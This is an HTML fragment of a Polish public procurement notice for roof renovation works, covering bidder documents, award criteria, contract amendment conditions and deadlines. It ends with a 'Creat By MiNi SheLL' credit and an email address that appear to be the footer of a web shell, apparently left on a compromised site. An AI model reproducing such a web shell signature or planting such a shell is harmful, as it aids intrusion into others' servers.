<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnienie warunków , o których mowa w art.22.ust.1 upzp, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b upzp, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda:
pisemnego zobowiązania innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia _ w oryginale ,wg wzoru stanowiącego załącznik nr 7; Informację banku  lub spółdzielczej kasy oszczędnościowo_ kredytowej potwierdzającą  wysokość posiadanych środków finansowych lub zdolność kredytową  tego podmiotu , wystawioną nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert- jeżeli udostępnia zasoby,   wykazu robót budowlanych wykonanych (zakończonych) oraz nie wykonanych lub
wykonanych nienależycie przez _inny podmiot_, w okresie ostatnich pięciu lat przed upływem
terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz
z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów
określających, że roboty te zostały wykonane w sposób należyty oraz wskazujących że zostały
wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone-  jeżeli udostępnia zasoby, o których mowa  w punkcie VIII.1.1. - wg wzoru stanowiącego załącznik nr 4;

Wykaz   dotyczy   wyłącznie wszystkich robót   budowlanych   polegających  na budowie i_lub przebudowie i_lub remoncie dachów wielospadowych o konstrukcji drewnianej, w zakresie rzeczowym których było wykonanie co najmniej: pokrycie dachu z blachy na powierzchni minimum 200m2, w tym 



chociaż  jedno pokrycie stanowiła  blacha miedziana, wykonanie konstrukcji drewnianych więźb dachowych lub przy więźbach dachowych np. lukarny, wykonanie  instalacji odgromowej. 
     
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art.26 ust.2b upzp, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów chyba, że za nieudostępnienie zasobów nie ponosi winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - termin realizacji- wyłacznie w przypadku skrócenia cyklu realizacji do maksymalnie 86 dni włącznie - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku :

a)	zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu zamówienia na    osobę (y)  spełniającą (e) co najmniej warunki podmiotowe określone w Rozdz. I IDW,

b)	zmiany  lub konieczności  dodatkowego wprowadzenia na plac budowy - podwykonawcy lub dalszego podwykonawcy, o ile Wykonawca w złożonej ofercie uwzględnił powierzenie podwykonawcy części zamówienia,

c)	 wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych (siła wyższa) uniemożliwiających wykonanie robót zgodnie z zasadami wiedzy technicznej, obowiązującymi przepisami i warunkami technologicznymi określonymi dla robót, które miałyby być wykonane w tych warunkach,

   d)  kiedy rozliczenie kosztorysem powykonawczym  pełnego zakresu prac określonego dla Części III. Etapu II. będzie niższe od ceny kosztorysowej  podanej w ofercie wykonawcy i określonej w oparciu o Przedmiar robót załączony przez Zamawiającego
- Zamawiający zleci dotychczasowemu wykonawcy wykonanie zamówienia uzupełniającego do 20%  zamówienia podstawowego. Rozliczenie zamówienia uzupełniającego dokonane zostanie w oparciu o ceny jednostkowe podane w kosztorysie ofertowym dla zamówienia podstawowego pomnożone przez  faktycznie wykonane jednostki obmiarowe zleconych robót uzupełniających, 

    e) cena kosztorysowa podana w ofercie będzie niższa od posiadanych środków finansowych na  realizacje Części III. Etapu II. -  Zamawiający zleci dotychczasowemu wykonawcy wykonanie zamówienia uzupełniającego do wysokości posiadanych środków finansowych, jednak nie więcej niż 10%  zamówienia podstawowego.

2.  Sporządzenia aneksu do umowy nie wymaga : zmiana danych teleadresowych, zmiana osób wskazanych do   kontaktów między stronami umowy, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy  (np. zmiana rachunku bankowego), zmiana kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu w przypadku pisemnego wyrażenia zgody przez Zamawiającego. 

3.  O interpretacji zdarzenia siły wyższej  i ewentualnym uznaniu przedłużenia terminu wykonania robót  z tego powodu, będzie decydował Prezes Karkonoskiego Stowarzyszenia Edukacyjnego w trakcie realizacji robót, po złożeniu pisemnego, udokumentowanego wniosku Wykonawcy wraz z opinią Inspektora Nadzoru</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sep.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w wersji elektronicznej_ bezpłatnie ze strony internetowej; w wersji papierowej _ w ciągu 5 dni od daty złożenia wniosku z dołączonym dowodem wpłaty 20 zł na konto Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2016 godzina 09:00, miejsce: grzecznościowo _Parafia Rzymskokatolicka pw. Św. Erazma i Pankracego , Plac Kościelny 1-2, 58-500 Jelenia Góra lub złożyć bezpośrednio - grzecznościowo na Plebani Parafii (adres jw.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane środkami z dotacji MKiDN na ochronę zabytków w 2016 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com